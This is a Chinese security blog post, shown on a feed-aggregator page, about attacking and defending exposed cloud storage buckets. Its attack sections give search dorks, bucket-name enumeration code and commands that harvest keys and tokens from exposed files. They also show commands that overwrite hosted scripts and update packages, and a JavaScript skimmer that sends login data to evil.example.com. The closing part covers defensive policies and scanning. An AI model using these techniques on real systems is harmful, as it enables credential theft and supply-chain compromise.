惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Schneier on Security
F
Fortinet All Blogs
博客园_首页
The GitHub Blog
The GitHub Blog
V
Visual Studio Blog
D
DataBreaches.Net
aimingoo的专栏
aimingoo的专栏
爱范儿
爱范儿
B
Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
N
Netflix TechBlog - Medium
阮一峰的网络日志
阮一峰的网络日志
P
Proofpoint News Feed
D
Docker
Engineering at Meta
Engineering at Meta
大猫的无限游戏
大猫的无限游戏
The Cloudflare Blog
罗磊的独立博客
云风的 BLOG
云风的 BLOG
Microsoft Azure Blog
Microsoft Azure Blog
T
The Exploit Database - CXSecurity.com
博客园 - 三生石上(FineUI控件)
量子位
The Last Watchdog
The Last Watchdog
MyScale Blog
MyScale Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
T
The Blog of Author Tim Ferriss
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
小众软件
小众软件
Cloudbric
Cloudbric
博客园 - 司徒正美
H
Help Net Security
人人都是产品经理
人人都是产品经理
Application and Cybersecurity Blog
Application and Cybersecurity Blog
L
LangChain Blog
Latest news
Latest news
M
MIT News - Artificial intelligence
T
Threat Research - Cisco Blogs
博客园 - Franky
S
Security Affairs
W
WeLiveSecurity
F
Full Disclosure
Know Your Adversary
Know Your Adversary
Google DeepMind News
Google DeepMind News
The Hacker News
The Hacker News
Cyberwarzone
Cyberwarzone
美团技术团队
PCI Perspectives
PCI Perspectives
C
Check Point Blog
Spread Privacy
Spread Privacy

博客园_首页

Plist 二进制格式 Milvus 和 PGVector,哪个更好? OpenClaw 已过时?在 VS Code 中运行 Hermes Agent! 第30篇文章:一个大三计科生的自白 Manim如何在数学公式中完美显示中文? Docker 部署 RocketMQ 5 并发编程核心概念辨析 C#事务处理最佳实践:别再让“主表存了、明细丢了”的破事发生 CLI 是什么?为什么大厂突然集体卷命令行? 【从0到1构建一个ClaudeAgent】协作-自主Agent UIImageView 设置图片不生效的原因排查 最小二乘问题详解20:无先验约束下的增量式SFM自由网平差 痞子衡嵌入式:大话双核i.MXRT1180之XIP应用里借助MU实现可靠Flash IAP的方法 AI Chat 封装, SemanticKerne.AiProvider.Unified 已发布 Windows下右键编辑js文件无法打开记事本——在注册表中使用环境变量 在后台服务中使用 Scoped 服务,为什么总是报错? H200 安装驱动并使用sglang启动模型 wireshark 抓包Trap上报告警内容 我用 AI 辅助开发了一系列小工具(2):图片压缩工具 [A Primer On MC and CC] 2.1 Memory Consistency 1 - 指令重排序和 SC 模型 Oracle数据库SCN推进技术详解与实践指南 玩转控件:封装个带图片的Label控件 Claude Code 4.7 真正该升级的不是模型,而是你的工作流 前端小白一句话,AI 帮我做了个颜值拉满的桌面媒体播放器。当代码不再是门槛,一句话编程就是现实。 5. WorkBuddy: 小龙虾的灵魂三件套,让你的小龙虾不只是工具 SQLite 分片方案实战:三种分片策略的深度对比 告别简陋 UI!一款基于 Fluent Design 和基于 WinUI 的开源免费、现代化的 Avalonia UI 控件库 关于二进制排列组合枚举的总结 AI开发-python-LangGraph框架(3-27-LangGraph从零实现大模型智能决策工作流) ElasticSearch主分片和副本分片概念详解 【002】HTTPS 粗解:证书、TLS 握手与对后端配置的影响 Hermes Agent 一周暴涨五万 Star,但我劝你别急着追 明明连接的是Redis的DB0,为什么能查到DB3的数据? 【从0到1构建一个ClaudeAgent】协作-Agent团队 熟悉电子元器件之后,电子小白下一步该怎么走? MAF快速入门(23)通过C#类定义Skills .NET 高级开发 | 手写一个对象映射框架 FastAPI数据库ORM怎么选?我肝了三个Demo后,终于不再纠结了 mysqldump 参数拾遗:在遗忘与铭记之间 C# .NET 周刊|2026年3月5期 Claude code入门 - 陈彦斌 一文学习入门 ThingsBoard 开源物联网平台 GitHub 热门项目 | 2026年04月16日 如何为GIT设置全局勾子,为每次提交追加信息 Number.isFinite和isFinite与isNaN()和Number.isNaN的区别 PortSwigger SQL注入LAB2 推荐一个测试人必备的Skills,从功能到性能全搞定(附详细实操和安装下载方式) 筑基期:掌握Odoo基础核心知识点02(Odoo XML 开发方式详解) GLM模型这么火,咱们用vllm也咧一个呗! 深入理解 AbortController:从底层原理到跨语言设计哲学 字符串学习笔记 多租户系统框架的基础模块设计和分析设计 Apache SeaTunnel Zeta 为什么能做到“又快又稳”? AI开发-python-LangGraph框架(3-26-LangGraph基本概念及第一个简单样例) Vue 3 组件通信,别只会用 Props 和 Emits 了,这几个狠活儿你得看看 ElasticSearch7.X版本配置密码 用Manim实现动态交点计算--从一个动点问题说起 团结引擎+Addressable+Instant Game打包抖音小游戏 function call 实战:让 LLM 自动判断 pod 异常、调用日志工具并完成故障分析 bubseek —— 让 Agent 的足迹,变成团队的洞察 通过 C# 读取并导出 PDF 书签 如何用 GitHub Actions 实现 Steam 自动化发布 【从0到1构建一个ClaudeAgent】并发-后台任务 .NET 高级开发 | 定制 ASP.NET Core 框架 电子小白:什么是运算放大器(运放) zero2Agent:面向大厂面试的 Agent 工程教程,从概念到生产的完整学习路线 堆上的ORW HC32F460 USB CDC通信异常:非对齐访问异常排查 20260413-Hyperbridge 攻击事件:发生在默克尔山上的验证绕过 那些喊着AI 要淘汰你的人,正在靠你的焦虑赚大钱! 深度学习进阶(八)Swin Transformer 最小二乘问题详解19:带先验约束的增量式SFM优化与实现 SnapTranslate 3.0 正式发布:全局划词翻译 + 完整英语学习闭环,一站式搞定查词、记词、复习 工作的意义、工作的困难认知再思考 .NET + AI 进阶实战:基于类的技能开发 - 打造可治理的 Agent 能力模块 【从0到1构建一个ClaudeAgent】规划与协调-技能 上周热点回顾(4.6-4.12) 电子小白的工具三件套:面包板、杜邦线、万能板 单表五亿数据的查询优化 | Mysql、StarRocks 2. WorkBuddy:从“我是谁”到“帮我干活” C# 如何减少代码运行时间:7 个实战技巧 基于HelixToolkit.SharpDX 渲染3D模型 - 笺上知微 从零开始的双臂具身VLA起源及现阶段发展综述 - SkyXZ 记对 xonsh shell 的使用, 脚本编写, 迁移及调优 - pluvium27 受够了Vibe Coding的失控?换个起点,让AI事半功倍 从开始配置漏洞环境到漏洞复现流程 - 難しい 关于10年工作经验的程序员对OpenClaw的实战经验分享以及看法 - 虚无境 Any metadata 的内存布局 C# .NET 周刊|2026年3月2期 - InCerry 我帮你测过了,测试圈排名第二的 Skill 依然很牛逼 Skill Discovery | 无监督技能发现的经典工作总结 - MoonOut 上下文工程是什么?过时了么?一文讲明白! - 一枫说码 开了 TUN 模式还是直连?90% 的人都踩过这个坑 AScript扩展多种脚本语言 - rockey627 AI 学习笔记:Agent 的记忆机制 你能被装进一个文件里吗?——7 万人把同事"蒸馏"成了 AI - 我没有三颗心脏 Claude Code 通关手册(七):给 AI 装上技能包——Skills 完全指南 - 暮色之狐 在浏览器中快速编辑代码:VSCode Web 集成实践 - Newbe36524 蒸馏自己 skill?基于 Deepseek 的蒸馏器,丐版蒸馏方式,简单便捷 - To_Carpe_Diem Spring AI Aliababa和AgentScope,哪个更好? - 苏三说技术
一个公开的存储桶,让我摸进了公司的内网:云存储安全攻防实战
明.Sir · 2026-06-15 · via 博客园_首页

上周一个客户找到我,说他们收到云厂商的安全告警——某个存储桶在凌晨3点被大量下载,疑似数据泄露。客户很慌,问我:"我们的桶设了权限的,怎么还会被拖?"

我笑着说:"你设的权限,怕不是'公开可读'那种权限吧?"

一查,果不其然。一个存放日志归档的S3兼容桶,Bucket Policy配置成了Principal: "*"Effect: "Allow",配上Action: "s3:GetObject"。这不是锁,这是敞着门让人进。

这种案例我一年能碰上十几起。今天就把云存储桶安全攻防的全流程拆开揉碎了讲清楚——从发现到利用,从利用到防御,一条龙。

第一步:如何发现暴露的存储桶

云存储桶的发现,主要分两条路:被动信息收集主动探测

被动收集:Google Hacking + GitHub Dorking

最省力的方式,让搜索引擎帮你找。

# Google dorking 找公开桶
site:oss.aliyuncs.com intitle:"Index of"
site:s3.amazonaws.com "bucket"
site:blob.core.windows.net intitle:"Index of"

# 找暴露的存储桶URL
"Bucket: " "s3.amazonaws.com"
"Endpoint: " "oss-cn-hangzhou.aliyuncs.com"

GitHub也是重灾区。很多开发者在配置文件中硬编码了桶的访问信息,甚至直接把Bucket Policy贴到了公开仓库。

# GitHub 搜索暴露的云存储配置
"aws_access_key_id" AND "s3" language:yaml
"oss_access_key_id" language:json
"storage_account" AND "connection_string" language:python

前两天我随手一搜,就发现了一个包含阿里云OSS AccessKey的公共仓库——用ali-oss SDK配置了完整的写权限。这种属于致命级别的泄露,攻击者拿到后不仅能读数据,还能上传恶意文件。

主动探测:我自己常用的工具链

被动找不完的,主动来扫。

# 安装 S3Scanner 扫描公开桶
pip install s3scanner

# 批量检测桶列表
s3scanner scan --bucket-file buckets.txt --out found.txt

# buckets.txt 内容示例
dev-backup.company.com
prod-logs.company.com
test-assets.company.com
data-analytics.company.com

这里有个关键技巧:桶命名模式预测。一旦你拿到一个公司的一个桶名,按命名规律可以推出其他桶。

import boto3
import re

# 根据已知桶名预测模式
known_bucket = "prod-logs-company"
patterns = [
    known_bucket,
    known_bucket.replace("prod", "dev"),
    known_bucket.replace("prod", "test"),
    known_bucket.replace("logs", "backup"),
    known_bucket.replace("logs", "data"),
    f"{known_bucket}-archive",
    f"{known_bucket}-bak",
]

s3 = boto3.client('s3')
for bucket in patterns:
    try:
        response = s3.list_objects_v2(Bucket=bucket, MaxKeys=1)
        print(f"[+] 可读: {bucket} - {response.get('Contents', [])}")
    except Exception as e:
        code = e.response['Error']['Code']
        if code == 'NoSuchBucket':
            print(f"[-] 不存在: {bucket}")
        elif code == 'AccessDenied':
            print(f"[*] 存在但无权限: {bucket}")

跑一轮下来,经常能扫到意外惊喜——Dev环境的备份桶、测试数据桶,权限往往比Prod松散得多。

第二步:捅开之后的骚操作

找到可读的桶只是开始,真正的价值在于能从桶里挖到什么

数据侦察:目录漫游的艺术

# 递归列出桶内所有文件
aws s3 ls s3://exposed-bucket --recursive --human-readable

# 按大小排序找出"大鱼"
aws s3 ls s3://exposed-bucket --recursive | sort -k3 -rn | head -20

# 搜索敏感关键词
aws s3 ls s3://exposed-bucket --recursive | grep -iE "\.(pem|key|env|config|json|sql|csv|xlsx|pdf|dump)"

一次实战中,我在一个"测试"桶里翻出了以下文件:

  • config/staging.env — 内含数据库连接串和Redis密码
  • backup/db_dump_20260501.sql — 完整的用户表数据
  • deploy/ssh_key_staging.pem — 测试服务器SSH密钥
  • logs/app/2026/04/ — 应用日志,含用户Token和API请求

一条凭证通向一个内网。 拿到那个.pem文件后,我直接SSH到了他们的Staging服务器——而那条Staging环境,竟然和生产环境在同一VPC下。从公开桶到内网漫游,整个过程不到40分钟。

日志中的金矿

千万别小看日志。很多人觉得日志"没什么价值",加密程度也是最松的。

# 从日志中提取API Token
grep -oP '"token":\s*"[^"]+"' app-2026-*.log | sort -u

# 提取IP白名单
grep -oP '"client_ip":\s*"[^"]+"' access.log.* | sort -u

# 提取用户操作记录
grep "ERROR" error.log.* | grep -i "unauthorized\|forbidden\|permission"

我见过最离谱的一次,一个桶里存了半年的Nginx访问日志,里面记满了API请求的完整URL——包括query string里的Token。等于攻击者拿到了一把通往所有内部API的万能钥匙。

第三步:写入权限才是真正的噩梦

比可读桶更可怕的是可写桶

# 检查桶的写入权限
echo "test" > /tmp/test.txt
aws s3 cp /tmp/test.txt s3://exposed-bucket/test_write_permission.txt

# 如果能写入,尝试覆盖关键文件
aws s3 cp /tmp/malicious.js s3://exposed-bucket/static/js/app.js

可写桶的攻击路径:

供应链投毒

如果你的桶被用来托管前端静态资源,攻击者上传一个恶意JS文件:

// 看似正常的埋点代码,实际窃取用户凭证
(function() {
    const originalFetch = window.fetch;
    window.fetch = function(...args) {
        // 偷偷记录请求中的敏感信息
        if (args[0].includes('/api/login') || args[0].includes('/token')) {
            fetch('https://evil.example.com/steal', {
                method: 'POST',
                body: JSON.stringify({url: args[0], body: args[1]?.body})
            });
        }
        return originalFetch.apply(this, args);
    };
})();

如果用户访问的页面加载了这个JS,所有登录信息都会被劫持。而这种攻击最可怕的地方在于——你完全不知道它在发生,直到有用户报告异常。

恶意文件上传导致RCE

更直接的攻击:上传伪装成更新包的恶意文件。

# 覆盖OTA更新包
aws s3 cp /tmp/backdoor.sh s3://exposed-bucket/updates/v2.1.3/update.sh
# 覆盖客户端下载的安装程序
aws s3 cp /tmp/trojan.msi s3://exposed-bucket/downloads/installer-v3.0.msi

第四步:防御指南(说人话版)

讲了这么多攻击,必须把防守也说清楚。下面是我给客户的三道防线

一、最小权限原则 —— 最便宜也最有效的防御

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::my-bucket/*",
      "Condition": {
        "Bool": {"aws:SecureTransport": "false"}
      }
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123456789:role/app-server"
      },
      "Action": ["s3:GetObject", "s3:PutObject"],
      "Resource": "arn:aws:s3:::my-bucket/app-data/*"
    }
  ]
}

关键点:

  • 永远不要"Principal": "*"配合"Effect": "Allow"
  • Deny兜底策略:先拒绝所有人,再按需放行
  • 限定SourceIPSecureTransport
  • 使用预签名URL(Presigned URL)替代公开访问

二、自动化扫描 —— 别等人告诉你桶暴露了

#!/usr/bin/env python3
"""云存储桶安全巡检脚本"""
import boto3
import json
from botocore.exceptions import ClientError

def check_bucket_public_access(bucket_name):
    """检查存储桶是否公开可访问"""
    s3 = boto3.client('s3')
    results = {'bucket': bucket_name, 'risks': []}
    
    # 1. 检查Bucket Policy
    try:
        policy = s3.get_bucket_policy(Bucket=bucket_name)
        policy_doc = json.loads(policy['Policy'])
        for statement in policy_doc.get('Statement', []):
            principal = statement.get('Principal', {})
            if principal in ('*', {'AWS': '*'}):
                results['risks'].append({
                    'type': 'PUBLIC_POLICY',
                    'detail': f"Statement allows public: {statement.get('Effect')}"
                })
    except ClientError as e:
        if e.response['Error']['Code'] != 'NoSuchBucketPolicy':
            results['risks'].append({'type': 'POLICY_CHECK_FAILED', 'detail': str(e)})
    
    # 2. 检查ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl.get('Grants', []):
            grantee = grant.get('Grantee', {})
            if grantee.get('URI', '') == 'http://acs.amazonaws.com/groups/global/AllUsers':
                results['risks'].append({
                    'type': 'PUBLIC_ACL',
                    'detail': f"Public {grant['Permission']} via ACL"
                })
    except Exception as e:
        results['risks'].append({'type': 'ACL_FAILED', 'detail': str(e)})
    
    # 3. 检查Block Public Access设置
    try:
        bpa = s3.get_public_access_block(Bucket=bucket_name)
        for k, v in bpa['PublicAccessBlockConfiguration'].items():
            if not v:
                results['risks'].append({
                    'type': 'BPA_DISABLED',
                    'detail': f"{k} is disabled"
                })
    except ClientError:
        results['risks'].append({'type': 'BPA_NOT_CONFIGURED'})
    
    return results

# 扫描所有桶
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
for b in buckets:
    result = check_bucket_public_access(b['Name'])
    if result['risks']:
        print(f"[!] {b['Name']}: {len(result['risks'])} 个风险")
        for r in result['risks']:
            print(f"    {r['type']}: {r['detail']}")

把这脚本挂到CI/CD或者定时任务里,每天跑一次。发现风险直接飞书/钉钉告警。

三、日志审计与异常检测

# 开启S3访问日志(发到独立的审计桶)
aws s3api put-bucket-logging \
  --bucket prod-data \
  --bucket-logging-status '{
    "LoggingEnabled": {
      "TargetBucket": "audit-logs-prod",
      "TargetPrefix": "s3-access/prod-data/"
    }
  }'

# 分析异常访问模式
# 1. 来自非预期地域的访问
# 2. 下载量突然暴增(数据拖取)
# 3. 非工作时间的大量访问
# 4. 批量枚举对象(403连发)

我在一个客户的审计日志里发现,某个桶在凌晨的下载量是白天的10倍,来源IP来自东欧。客户一查,果然是被Web爬虫抓到了公开桶。

写在最后

云存储桶安全的核心问题从来不是技术——是意识

每次我处理这类事件,90%的场景都是:开发图方便、运维没复查、安全没覆盖到。一条错误的Bucket Policy,几个字符的问题,带来的后果可能是整个公司数据资产暴露。

给所有安全从业者和运维一句实在话:

每天花5分钟检查一下你们公司的存储桶权限,比你买一百万的WAF都管用。

别等到云厂商的告警邮件发到你CEO邮箱,再去查是哪条Policy出了问题。



关注「安全值班室」公众号

每天实战攻防案例 + 安全干货

关注安全值班室